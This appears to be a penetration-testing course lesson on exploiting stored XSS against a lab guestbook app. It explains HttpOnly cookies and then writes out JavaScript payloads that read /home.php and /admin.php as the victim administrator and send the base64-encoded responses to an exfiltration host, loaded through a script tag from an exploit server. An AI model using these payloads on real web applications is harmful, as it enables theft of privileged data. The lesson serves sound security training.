Introduction to XSS Exploitation

We can use cross-site scripting (XSS) exploits to make HTTP requests, retrieve their responses, and exfiltrate data to a server under our control. As such, we can write XSS payloads that make cross-origin requests and combine XSS with CSRF payloads to achieve an exploitation technique that poses a threat to the entire internal network of the victim.

Additionally, the fact that web browsers typically enforce a SameSite policy of Lax for cookies if the SameSite attribute is not explicitly set restricts the ability for CSRF exploitation significantly. Thus, combining XSS and CSRF proves to be a powerful exploitation technique.

HTTPOnly Cookie Flag

Stealing victims' session cookies is the most widely exploited technique that threat actors carry out using XSS vulnerabilities; however, this technique can be prevented by utilizing the HttpOnly attribute on the session cookie. This attribute prevents access to the cookie from JavaScript code. More specifically, if we access document.cookie, cookies with the HTTPOnly attribute set will not exist. This effectively prevents the exfiltration of the victim's session cookie. However, it does not necessarily lessen the severity of XSS vulnerabilities. Since an XSS allows us to execute arbitrary JavaScript code in the victim's browser within the vulnerable web application and in the context of the victim, we can perform the same actions as if we knew the session cookie. However, we have to write an XSS payload to do the corresponding actions for us instead of doing them manually after setting the victim's session cookie in our browser.

Exfiltrating Data with XSS

Since the payload of an XSS attack is executed in the browser and user context of the victim, it enables an attacker to access any data from the victim's point of view. As such, a low-privilege attacker can use an XSS vulnerability to obtain administrative access to the vulnerable web application if the victim has administrative privileges. We can abuse this to exfiltrate arbitrary data from the web application.

To access information within the victim's context and exfiltrate information to our exfiltration server, we can use an XMLHttpRequest object, which enables us to send HTTP requests and interact with the responses.

Our sample web application is the same guestbook application we have seen before. The same XSS vulnerability is still present. However, this time, the session cookie has the HTTPOnly flag set, preventing us from stealing it:

Assuming the victim is an administrator, we should enumerate the web application from their point of view to determine if any functionalities within the web application are only visible to administrators. To do so, let us access endpoints we already know from the victim's context and exfiltrate the response to our exfiltration server. To achieve this, we can make a guestbook entry containing the following XSS payload:

<script src=""http://exploitserver.htb/exploit"></script>

Afterward, we can use the exploitserver to write the XSS payload. We will use a simple payload that accesses the /home.php endpoint and exfiltrates the base64-encoded response to the exfiltration server:

var xhr = new XMLHttpRequest();
xhr.open('GET', '/home.php', false);
xhr.withCredentials = true;
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

After waiting for the victim to trigger our payload, we will receive the base64-encoded response at our exfiltration server:

After decoding the response, we can analyze it to see if there are any differences to what our low-privilege user can access at the /home.php endpoint. We can identify that there is a reference to the admin dashboard at /admin.php in the navigation part of the response, which is not there in our user's context:

Let us exfiltrate the administrator dashboard, including any potentially sensitive data displayed there, by adjusting the payload on the exploit server to exfiltrate the /admin.php endpoint instead:

var xhr = new XMLHttpRequest();
xhr.open('GET', '/admin.php', false);
xhr.withCredentials = true;
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

We do not post a new entry to the guestbook since the admin visits the guestbook periodically and triggers our XSS payload each time. Since this triggers the payload code to be loaded from the exploit server, changing the exploit code there is sufficient. This enables us to exfiltrate the entire admin dashboard, including all information accessible by the administrator: